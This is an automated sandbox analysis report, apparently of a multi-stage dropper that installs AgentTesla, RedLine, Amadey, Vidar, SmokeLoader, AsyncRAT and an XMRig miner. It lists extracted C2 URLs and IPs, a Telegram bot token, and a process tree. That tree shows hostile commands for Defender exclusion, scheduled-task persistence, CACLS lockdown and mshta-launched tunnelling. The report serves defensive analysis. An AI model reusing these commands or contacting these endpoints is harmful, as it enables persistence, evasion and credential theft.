agenttesla | 76a7490d3f1b0685f60a417d1c9cf96927b473825a914221f092f82ea112b571

max time kernel
20s
max time network
686s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
21-10-2023 11:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

800a6337b0b38274efe64875d15f70c5
SHA1

6b0858c5f9a2e2b5980aac05749e3d6664a60870
SHA256

76a7490d3f1b0685f60a417d1c9cf96927b473825a914221f092f82ea112b571
SHA512

bf337140044a4674d69f7a2db30389e248593a99826c8731bc0a5ac71e46819eb539d8c7cbeab48108310359f5604e02e3bd64f17d9fdd380b574f329543645e
SSDEEP

48:6O/tGt28lK9iqmcfaFXfkeLJhyPFlWa8tYb/INV/cpwOulavTqXSfbNtm:j/IUiqtaJkeqDUt5xcpmsvNzNt

Malware Config

Extracted

Family

agenttesla

https://api.telegram.org/bot6564962941:AAEWWFBvCJUfh4ZCVgXTE-QUYajcwLUCJU0/

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.1

Botnet

Default

127.0.0.1:4449

20.211.121.138:4449

Mutex

udbyxlklndgyt

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

amadey

Version

3.89

http://193.42.32.29/9bDc8sQ/index.php

Attributes

install_dir
1ff8bec27e
install_file
nhdues.exe
strings_key
2efe1b48925e9abf268903d42284c46b

rc4.plain

Extracted

Family

vidar

Version

6.1

Botnet

f02b730f81476e82205d9d2eb21e0ef8

https://steamcommunity.com/profiles/76561199563297648

https://t.me/twowheelfun

Attributes

profile_id_v2
f02b730f81476e82205d9d2eb21e0ef8
user_agent
Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/605.1.15

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

smokeloader

Botnet

pub1

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral1/memory/888-588-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba
behavioral1/memory/4596-604-0x0000000000400000-0x0000000000D1B000-memory.dmp	family_glupteba

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral1/memory/1112-23-0x0000000000700000-0x000000000075A000-memory.dmp	family_redline
behavioral1/memory/1112-73-0x0000000000400000-0x000000000047E000-memory.dmp	family_redline
behavioral1/memory/3848-173-0x00000000020B0000-0x000000000210A000-memory.dmp	family_redline
behavioral1/memory/424-319-0x0000000000500000-0x000000000055A000-memory.dmp	family_redline
behavioral1/files/0x000600000001ae04-1941.dat	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral1/files/0x000600000001ac50-186.dat	family_xmrig
behavioral1/files/0x000600000001ac50-186.dat	xmrig
behavioral1/memory/512-202-0x00007FF7C56C0000-0x00007FF7C61C3000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/1588-75-0x0000000000400000-0x0000000000418000-memory.dmp	asyncrat

Contacts a large (1250) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

pid	Process
4524	Veeam.Backup.Service.exe
1112	ca.exe
1232	chungzx.exe
1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
4980	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
1796	msedge.exe
4784	shareu.exe
3848	fra.exe
512	xmrig.exe
3608	WatchDog.exe
2780	newumma.exe
4836	yes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000600000001ae43-2626.dat	themida

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001ac88-212.dat	upx
behavioral1/memory/4836-214-0x00007FF775A40000-0x00007FF775F86000-memory.dmp	upx
behavioral1/files/0x000600000001acb1-401.dat	upx
behavioral1/memory/4312-427-0x0000000000C50000-0x000000000119D000-memory.dmp	upx
behavioral1/memory/4836-499-0x00007FF775A40000-0x00007FF775F86000-memory.dmp	upx
behavioral1/files/0x000600000001acf6-592.dat	upx
behavioral1/files/0x000600000001adf7-1587.dat	upx
behavioral1/files/0x000600000001ae7c-3663.dat	upx
behavioral1/files/0x000600000001af2f-5456.dat	upx
behavioral1/files/0x000600000001af32-5474.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.159.66.125

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/5756-495-0x00007FF702770000-0x00007FF702E38000-memory.dmp	vmprotect
behavioral1/files/0x000600000001af04-5308.dat	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4047565704-754001510-1218967575-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kukdjki = "C:\\Users\\Admin\\AppData\\Roaming\\Kukdjki.exe"	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
167	api.myip.com
169	ipinfo.io
174	ipinfo.io
303	api.myip.com
5617	api.myip.com
166	api.myip.com
2574	ip-api.com
3374	api.myip.com
3411	ipinfo.io
3560	ipinfo.io
5621	ipinfo.io
2457	ip-api.com
3409	ipinfo.io
5624	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1580 set thread context of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1796 set thread context of 1588	1796	msedge.exe	80

Launches sc.exe 30 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
8552	sc.exe
8280	sc.exe
10020	sc.exe
8656	sc.exe
5484	sc.exe
5284	sc.exe
2692	sc.exe
8932	sc.exe
8072	sc.exe
8480	sc.exe
8356	sc.exe
9844	sc.exe
11992	sc.exe
6816	sc.exe
7788	sc.exe
8764	sc.exe
4016	sc.exe
8048	sc.exe
3888	sc.exe
10424	sc.exe
12252	sc.exe
5548	sc.exe
9100	sc.exe
9576	sc.exe
3636	sc.exe
3056	sc.exe
12136	sc.exe
4048	sc.exe
5908	sc.exe
8128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
3196	4152	WerFault.exe	119
6656	3608	WerFault.exe	91
7496	3028	WerFault.exe	248
5392	4296	WerFault.exe	274
656	7592	WerFault.exe	559
10472	10776	WerFault.exe	636
5876	7204	WerFault.exe	833

Creates scheduled task(s) 1 TTPs 26 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
7340	schtasks.exe
9616	schtasks.exe
10136	schtasks.exe
11968	schtasks.exe
10288	schtasks.exe
7820	schtasks.exe
6452	schtasks.exe
6752	schtasks.exe
12236	schtasks.exe
10920	schtasks.exe
7360	schtasks.exe
3516	schtasks.exe
7176	schtasks.exe
3580	schtasks.exe
6776	schtasks.exe
10908	schtasks.exe
7072	schtasks.exe
2276	schtasks.exe
8312	schtasks.exe
8672	schtasks.exe
5316	schtasks.exe
7284	schtasks.exe
9108	schtasks.exe
3300	schtasks.exe
6112	schtasks.exe
3316	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
9092	timeout.exe
7728	timeout.exe
10992	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4047565704-754001510-1218967575-1000_Classes\Local Settings	shareu.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6432	PING.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4980	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
4980	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
1112	ca.exe
1112	ca.exe
1588	CasPol.exe
1588	CasPol.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1372	a.exe
Token: SeDebugPrivilege	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
Token: SeDebugPrivilege	4980	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
Token: SeDebugPrivilege	1112	ca.exe
Token: SeDebugPrivilege	1588	CasPol.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2780	newumma.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1588	CasPol.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 4524	1372	a.exe	72
PID 1372 wrote to memory of 4524	1372	a.exe	72
PID 1372 wrote to memory of 4524	1372	a.exe	72
PID 1372 wrote to memory of 1112	1372	a.exe	73
PID 1372 wrote to memory of 1112	1372	a.exe	73
PID 1372 wrote to memory of 1112	1372	a.exe	73
PID 1372 wrote to memory of 1232	1372	a.exe	75
PID 1372 wrote to memory of 1232	1372	a.exe	75
PID 1372 wrote to memory of 1232	1372	a.exe	75
PID 1372 wrote to memory of 1580	1372	a.exe	76
PID 1372 wrote to memory of 1580	1372	a.exe	76
PID 1372 wrote to memory of 1580	1372	a.exe	76
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1580 wrote to memory of 4980	1580	Aviso%20de%20Pago_Banco%20BCP_Pdf.exe	78
PID 1372 wrote to memory of 1796	1372	a.exe	79
PID 1372 wrote to memory of 1796	1372	a.exe	79
PID 1372 wrote to memory of 1796	1372	a.exe	79
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1796 wrote to memory of 1588	1796	msedge.exe	80
PID 1372 wrote to memory of 4784	1372	a.exe	81
PID 1372 wrote to memory of 4784	1372	a.exe	81
PID 1372 wrote to memory of 4784	1372	a.exe	81
PID 1372 wrote to memory of 3848	1372	a.exe	82
PID 1372 wrote to memory of 3848	1372	a.exe	82
PID 1372 wrote to memory of 3848	1372	a.exe	82
PID 4784 wrote to memory of 4084	4784	shareu.exe	114
PID 4784 wrote to memory of 4084	4784	shareu.exe	114
PID 4784 wrote to memory of 4084	4784	shareu.exe	114
PID 1372 wrote to memory of 512	1372	a.exe	85
PID 1372 wrote to memory of 512	1372	a.exe	85
PID 4084 wrote to memory of 4684	4084	cmd.exe	87
PID 4084 wrote to memory of 4684	4084	cmd.exe	87
PID 4084 wrote to memory of 4684	4084	cmd.exe	87
PID 4084 wrote to memory of 3016	4084	cmd.exe	88
PID 4084 wrote to memory of 3016	4084	cmd.exe	88
PID 4084 wrote to memory of 3016	4084	cmd.exe	88
PID 1372 wrote to memory of 3608	1372	a.exe	91
PID 1372 wrote to memory of 3608	1372	a.exe	91
PID 1372 wrote to memory of 3608	1372	a.exe	91
PID 1372 wrote to memory of 2780	1372	a.exe	92
PID 1372 wrote to memory of 2780	1372	a.exe	92
PID 1372 wrote to memory of 2780	1372	a.exe	92
PID 3016 wrote to memory of 4384	3016	cmd.exe	93
PID 3016 wrote to memory of 4384	3016	cmd.exe	93
PID 3016 wrote to memory of 4384	3016	cmd.exe	93
PID 4684 wrote to memory of 2064	4684	cmd.exe	94
PID 4684 wrote to memory of 2064	4684	cmd.exe	94
PID 4684 wrote to memory of 2064	4684	cmd.exe	94
PID 1372 wrote to memory of 4836	1372	a.exe	95
PID 1372 wrote to memory of 4836	1372	a.exe	95

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe"
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Users\Admin\AppData\Local\Temp\a\ca.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ca.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
  2⤵
  - Executes dropped EXE
  PID:1232
- - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
    3⤵
    PID:6164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
      4⤵
      PID:6668
    - - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        5⤵
        Runs ping.exe
        
        PID:6432
    - - C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        5⤵
        
        PID:7832
      - C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        6⤵
        
        PID:11052
        
        C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        7⤵
        
        PID:10888
- C:\Users\Admin\AppData\Local\Temp\a\Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Aviso%20de%20Pago_Banco%20BCP_Pdf.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Users\Admin\AppData\Local\Temp\a\Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
    C:\Users\Admin\AppData\Local\Temp\a\Aviso%20de%20Pago_Banco%20BCP_Pdf.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- C:\Users\Admin\AppData\Local\Temp\a\msedge.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msedge.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1588
- C:\Users\Admin\AppData\Local\Temp\a\shareu.exe
  "C:\Users\Admin\AppData\Local\Temp\a\shareu.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a\start.vbs"
    3⤵
    PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4684
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("rathole client.toml",0)(window.close)
        5⤵
        
        PID:2064
      - C:\Users\Admin\AppData\Local\Temp\a\rathole.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\rathole.exe" client.toml
        6⤵
        
        PID:2576
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c nginx.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3016
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("nginx.exe",0)(window.close)
        5⤵
        
        PID:4384
      - C:\Users\Admin\AppData\Local\Temp\a\nginx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\nginx.exe"
        6⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\a\nginx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\nginx.exe"
        7⤵
        
        PID:4412
- C:\Users\Admin\AppData\Local\Temp\a\fra.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fra.exe"
  2⤵
  - Executes dropped EXE
  PID:3848
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  - Executes dropped EXE
  PID:512
- C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe"
  2⤵
  - Executes dropped EXE
  PID:3608
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1252
    3⤵
    - Program crash
    PID:6656
- C:\Users\Admin\AppData\Local\Temp\a\newumma.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newumma.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:2780
- - C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
    "C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe"
    3⤵
    PID:1476
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:2276
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\b24b726a24" /P "Admin:N"&&CACLS "..\b24b726a24" /P "Admin:R" /E&&Exit
      4⤵
      PID:4548
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "Utsysc.exe" /P "Admin:N"
        5⤵
        
        PID:3300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4652
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\b24b726a24" /P "Admin:N"
        5⤵
        
        PID:1540
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\b24b726a24" /P "Admin:R" /E
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4084
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "Utsysc.exe" /P "Admin:R" /E
        5⤵
        
        PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"
      4⤵
      PID:4304
    - - C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"
        5⤵
        
        PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe
      "C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe"
      4⤵
      PID:6856
  - - C:\Users\Admin\AppData\Local\Temp\1000004001\kos2.exe
      "C:\Users\Admin\AppData\Local\Temp\1000004001\kos2.exe"
      4⤵
      PID:6380
    - - C:\Users\Admin\AppData\Local\Temp\set16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\set16.exe"
        5⤵
        
        PID:6244
      - C:\Users\Admin\AppData\Local\Temp\is-S8C1G.tmp\is-NB0GK.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S8C1G.tmp\is-NB0GK.tmp" /SL4 $602E2 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224
        6⤵
        
        PID:4312
        
        C:\Program Files (x86)\MyBurn\MyBurn.exe
        
        "C:\Program Files (x86)\MyBurn\MyBurn.exe" -i
        7⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 20
        7⤵
        
        PID:7928
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 20
        8⤵
        
        PID:7048
        
        C:\Program Files (x86)\MyBurn\MyBurn.exe
        
        "C:\Program Files (x86)\MyBurn\MyBurn.exe" -s
        7⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Query
        7⤵
        
        PID:7180
    - - C:\Users\Admin\AppData\Local\Temp\K.exe
        
        "C:\Users\Admin\AppData\Local\Temp\K.exe"
        5⤵
        
        PID:2152
- C:\Users\Admin\AppData\Local\Temp\a\yes.exe
  "C:\Users\Admin\AppData\Local\Temp\a\yes.exe"
  2⤵
  - Executes dropped EXE
  PID:4836
- C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
  2⤵
  PID:4780
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:6648
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "SCSI Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB774.tmp"
      4⤵
      Creates scheduled task(s)
      PID:7340
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "SCSI Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCF43.tmp"
      4⤵
      Creates scheduled task(s)
      PID:7176
- C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
  2⤵
  PID:2888
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QPrDpam" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB64B.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:7284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\QPrDpam.exe"
    3⤵
    PID:7264
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    PID:8104
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    PID:7844
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    PID:5064
- C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
  2⤵
  PID:1716
- - C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
    3⤵
    PID:6220
- C:\Users\Admin\AppData\Local\Temp\a\smss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:3472
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:8168
- C:\Users\Admin\AppData\Local\Temp\a\987123.exe
  "C:\Users\Admin\AppData\Local\Temp\a\987123.exe"
  2⤵
  PID:4152
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 484
    3⤵
    - Program crash
    PID:3196
- C:\Users\Admin\AppData\Local\Temp\a\ch.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ch.exe"
  2⤵
  PID:424
- C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
  2⤵
  PID:3680
- - C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
    3⤵
    PID:6676
- C:\Users\Admin\AppData\Local\Temp\a\Random.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Random.exe"
  2⤵
  PID:4620
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:1880
  - - C:\Users\Admin\Pictures\G8KLs0iNy8AELzws9wyivwgn.exe
      "C:\Users\Admin\Pictures\G8KLs0iNy8AELzws9wyivwgn.exe"
      4⤵
      PID:3352
    - - C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
        5⤵
        
        PID:2472
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:3580
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
        6⤵
        
        PID:1992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:N"
        7⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:R" /E
        7⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:N"
        7⤵
        
        PID:192
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:R" /E
        7⤵
        
        PID:10192
  - - C:\Users\Admin\Pictures\bSZePAfoOvufJOXKwWRYcxpZ.exe
      "C:\Users\Admin\Pictures\bSZePAfoOvufJOXKwWRYcxpZ.exe"
      4⤵
      PID:4588
